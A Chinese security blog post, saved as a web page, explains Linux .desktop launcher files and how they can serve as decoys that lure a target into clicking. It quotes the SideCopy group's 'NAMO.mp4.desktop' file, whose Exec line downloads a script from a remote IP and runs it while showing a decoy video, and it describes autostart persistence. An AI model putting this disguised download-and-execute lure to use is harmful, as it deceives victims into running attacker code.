<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">

<script>
    (function(){
        if(''){
            if (prompt('请输入文章密码') !== ''){
                alert('密码错误！');
                history.back();
            }
        }
    })();
</script>








<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="https://fonts.cat.net/css?family=PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content=".desktop文件制作简单说明~">
<meta property="og:type" content="article">
<meta property="og:title" content="在Linux系统上创建诱饵文件(.Desktop)">
<meta property="og:url" content="http://yoursite.com/2021/12/12/%E5%9C%A8Linux%E7%B3%BB%E7%BB%9F%E4%B8%8A%E5%88%9B%E5%BB%BA%E8%AF%B1%E9%A5%B5%E6%96%87%E4%BB%B6-Desktop/index.html">
<meta property="og:site_name" content="Bu1&#39;Blog">
<meta property="og:description" content=".desktop文件制作简单说明~">
<meta property="og:locale">
<meta property="article:published_time" content="2021-12-12T08:49:23.000Z">
<meta property="article:modified_time" content="2021-12-12T09:01:09.110Z">
<meta property="article:author" content="Bu1">
<meta name="twitter:card" content="summary">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2021/12/12/在Linux系统上创建诱饵文件-Desktop/"/>





  <title>在Linux系统上创建诱饵文件(.Desktop) | Bu1'Blog</title>
  








<meta name="generator" content="Hexo 5.4.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Bu1'Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">如果能控制粗鄙的狂喜，就不会有深入骨髓的悲伤。</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2021/12/12/%E5%9C%A8Linux%E7%B3%BB%E7%BB%9F%E4%B8%8A%E5%88%9B%E5%BB%BA%E8%AF%B1%E9%A5%B5%E6%96%87%E4%BB%B6-Desktop/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Bu1'Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">在Linux系统上创建诱饵文件(.Desktop)</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2021-12-12T16:49:23+08:00">
                2021-12-12
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/linux%E5%AE%89%E5%85%A8/" itemprop="url" rel="index">
                    <span itemprop="name">linux安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2021/12/12/%E5%9C%A8Linux%E7%B3%BB%E7%BB%9F%E4%B8%8A%E5%88%9B%E5%BB%BA%E8%AF%B1%E9%A5%B5%E6%96%87%E4%BB%B6-Desktop/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count disqus-comment-count"
                        data-disqus-identifier="2021/12/12/在Linux系统上创建诱饵文件-Desktop/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  682 字
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  2 分钟
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p><code>.desktop</code>文件制作简单说明~</p>
<span id="more"></span>

<h2 id="0x01-Linux桌面启动器"><a href="#0x01-Linux桌面启动器" class="headerlink" title="0x01 Linux桌面启动器"></a>0x01 Linux桌面启动器</h2><p>可以添加桌面启动器诱导目标点击，类似于Windows系统上的快捷方式。在linux中，一切皆文件。启动器就是一个后缀为<code>.desktop</code>文件。</p>
<p>如创建一个intelliJ idea 的启动器</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">[Desktop Entry]</span><br><span class="line">Encoding=UTF-8</span><br><span class="line">Name=IntelliJ IDEA</span><br><span class="line">Name[en]=IntelliJ IDEA</span><br><span class="line">Name[en_US]=IntelliJ IDEA</span><br><span class="line">GenericName=IntelliJ IDEA</span><br><span class="line">Comment=The Java IDE for Professional Developers by JetBrains</span><br><span class="line">Exec=/opt/SoftWare/idea-IU-172.4343.14/bin/idea.sh %f</span><br><span class="line">Icon=/opt/SoftWare/idea-IU-172.4343.14/bin/idea.png</span><br><span class="line">Terminal=false</span><br><span class="line">Type=Application</span><br><span class="line">Categories=Application;Programme;</span><br></pre></td></tr></table></figure>

<blockquote>
<p>国家地区代码表 <a target="_blank" rel="noopener" href="http://www.lingoes.net/zh/translator/langcode.htm">http://www.lingoes.net/zh/translator/langcode.htm</a></p>
</blockquote>
<p><strong>语法解释</strong></p>
<table>
<thead>
<tr>
<th>关键词</th>
<th><strong>意义</strong></th>
</tr>
</thead>
<tbody><tr>
<td>[Desktop Entry]</td>
<td>文件头</td>
</tr>
<tr>
<td>Encoding</td>
<td>编码</td>
</tr>
<tr>
<td>Name</td>
<td>应用名称</td>
</tr>
<tr>
<td>Name[xx]</td>
<td>不同语言的应用名称</td>
</tr>
<tr>
<td>GenericName</td>
<td>描述</td>
</tr>
<tr>
<td>Comment</td>
<td>注释</td>
</tr>
<tr>
<td>Exec</td>
<td>执行的命令</td>
</tr>
<tr>
<td>Icon</td>
<td>图标路径</td>
</tr>
<tr>
<td>Terminal</td>
<td>是否使用终端</td>
</tr>
<tr>
<td>Type</td>
<td>启动器类型</td>
</tr>
<tr>
<td>Categories</td>
<td>应用的类型（内容相关）</td>
</tr>
</tbody></table>
<blockquote>
<p>说明：<br>其中 Exec 常用的参数有：%f %F %u %U<br>%f：单个文件名，即使选择了多个文件。如果已选择的文件不在本地文件系统中（比如说在HTTP或者FTP上），这个文件将被作为一个临时文件复制到本地，％f将指向本地临时文件；<br>%F：文件列表。用于程序可以同时打开多个本地文件。每个文件以分割段的方式传递给执行程序。<br>%u：单个URL。本地文件以文件URL或文件路径的方式传递。<br>%U：URL列表。每个URL以分割段的方式传递给执行程序。本地文件以文件URL或文件路径的方式传递。</p>
</blockquote>
<h2 id="0x02-利用实现"><a href="#0x02-利用实现" class="headerlink" title="0x02 利用实现"></a>0x02 利用实现</h2><p><code>.Desktop</code>文件创建创建流程</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1. 创建一个以.desktop为后缀的文件。</span><br><span class="line">2. 编写内容根据实际情况修改权限。</span><br><span class="line">3. 测试启动，添加信任。</span><br><span class="line">4. 移动到/usr/share/applications/目录下</span><br></pre></td></tr></table></figure>

<p>如SideCopy组织使用的诱饵文件<code>NAMO.mp4.desktop</code>内容为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[Desktop Entry] </span><br><span class="line">Encoding=UTF-8 </span><br><span class="line">Name=Army.mp4 </span><br><span class="line">Exec=sh -c &quot;/usr/bin/wget &#x27;http://assessment.moiochamns.comfunloads/v/3.php&#x27; -0 /tmp/NAMO.mp4; /usr/bin/wget &#x27;http://144.91.81.180/cmd.sh&#x27; -0 /tmp/exe.sh; cd /tmp; chmod +x exe.sh;vlc /tmp/NAMO.mp4 | bash exe.sh</span><br><span class="line">Terminal=false </span><br><span class="line">Type=Application </span><br><span class="line">Icon=video-x-generic </span><br><span class="line">Name[en_US]=NAMO.mp4 </span><br></pre></td></tr></table></figure>

<p>当目标点击后将会自动下载诱饵视频NAMO.mp4，于此同时也会下载<code>cmd.sh</code>以便后续执行操作。</p>
<h2 id="0x03-自启动"><a href="#0x03-自启动" class="headerlink" title="0x03 自启动"></a>0x03 自启动</h2><p>Linux程序.desktop文件几乎都放置在两个目录中：</p>
<ul>
<li><code>/usr/share/applications/</code>目录，该目录所有用户可见。</li>
<li><code>~/.local/share/applications/</code>目录，该目录当前用户可见。</li>
</ul>
<p>若是需要开机自动启动程序，则需把<code>.desktop</code>文件放置在<code>~/.config/autostart/</code>，这样就可以实现自启动。</p>
<h2 id="0x04-参考链接"><a href="#0x04-参考链接" class="headerlink" title="0x04 参考链接"></a>0x04 参考链接</h2><ul>
<li><a target="_blank" rel="noopener" href="https://ti.qianxin.com/blog/articles/Sidecopy-dual-platform-weapon/">https://ti.qianxin.com/blog/articles/Sidecopy-dual-platform-weapon/</a></li>
<li><a target="_blank" rel="noopener" href="https://linux.cn/article-9199-1.html">https://linux.cn/article-9199-1.html</a></li>
</ul>

      
    </div>
    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    Bu1
  </li>
<li class="post-copyright-link">
  <strong>本文链接：</strong>
  <a target="_blank" rel="noopener" href="http://bu1.github.io/2021/12/12/在Linux系统上创建诱饵文件-Desktop/" title="在Linux系统上创建诱饵文件(.Desktop)">http://bu1.github.io/2021/12/12/在Linux系统上创建诱饵文件-Desktop/</a>
</li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    
	<div>
      
        <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------END<i class="fa fa-paw"></i>-------------</div>
    
</div>
      
    </div>
    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/12/12/Terminal%E9%85%8D%E8%89%B2%E6%96%B9%E6%A1%88%E4%BF%AE%E6%94%B9%E6%96%B9%E6%B3%95%E5%8F%8A%E5%9C%A8%E7%94%A8%E6%96%B9%E6%A1%88/" rel="next" title="Terminal配色方案修改方法及在用方案">
                <i class="fa fa-chevron-left"></i> Terminal配色方案修改方法及在用方案
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/12/12/%E5%B0%8F%E6%8A%80%E5%B7%A7%EF%BC%9A%E4%BF%AE%E6%94%B9%E6%B3%A8%E5%86%8C%E8%A1%A8%E6%9D%A5%E6%8E%A7%E5%88%B6%E6%98%AF%E5%90%A6%E6%98%BE%E7%A4%BA%E6%96%87%E4%BB%B6%E5%90%8E%E7%BC%80%E5%90%8D/" rel="prev" title="小技巧：修改注册表来控制是否显示文件后缀名">
                小技巧：修改注册表来控制是否显示文件后缀名 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>

  
  
  
  
  



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a target="_blank" rel="noopener" href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.png"
                alt="" />
            
              <p class="site-author-name" itemprop="name"></p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%20%7C%7C%20archive">
              
                  <span class="site-state-item-count">38</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://tanpuhan.github.io" title="CoCo1er" target="_blank">CoCo1er</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.y1nhui.com" title="y1nhui" target="_blank">y1nhui</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-Linux%E6%A1%8C%E9%9D%A2%E5%90%AF%E5%8A%A8%E5%99%A8"><span class="nav-number">1.</span> <span class="nav-text">0x01 Linux桌面启动器</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-%E5%88%A9%E7%94%A8%E5%AE%9E%E7%8E%B0"><span class="nav-number">2.</span> <span class="nav-text">0x02 利用实现</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-%E8%87%AA%E5%90%AF%E5%8A%A8"><span class="nav-number">3.</span> <span class="nav-text">0x03 自启动</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04-%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5"><span class="nav-number">4.</span> <span class="nav-text">0x04 参考链接</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2018 &mdash; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Bu1</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">77.1k</span>
  
</div>


  <!--<div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>"



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>-->




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  

    
      <script id="dsq-count-scr" src="https://.disqus.com/count.js" async></script>
    

    
      <script type="text/javascript">
        var disqus_config = function () {
          this.page.url = 'http://yoursite.com/2021/12/12/%E5%9C%A8Linux%E7%B3%BB%E7%BB%9F%E4%B8%8A%E5%88%9B%E5%BB%BA%E8%AF%B1%E9%A5%B5%E6%96%87%E4%BB%B6-Desktop/';
          this.page.identifier = '2021/12/12/在Linux系统上创建诱饵文件-Desktop/';
          this.page.title = '在Linux系统上创建诱饵文件(.Desktop)';
        };
        var d = document, s = d.createElement('script');
        s.src = 'https://.disqus.com/embed.js';
        s.setAttribute('data-timestamp', '' + +new Date());
        (d.head || d.body).appendChild(s);
      </script>
    

  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
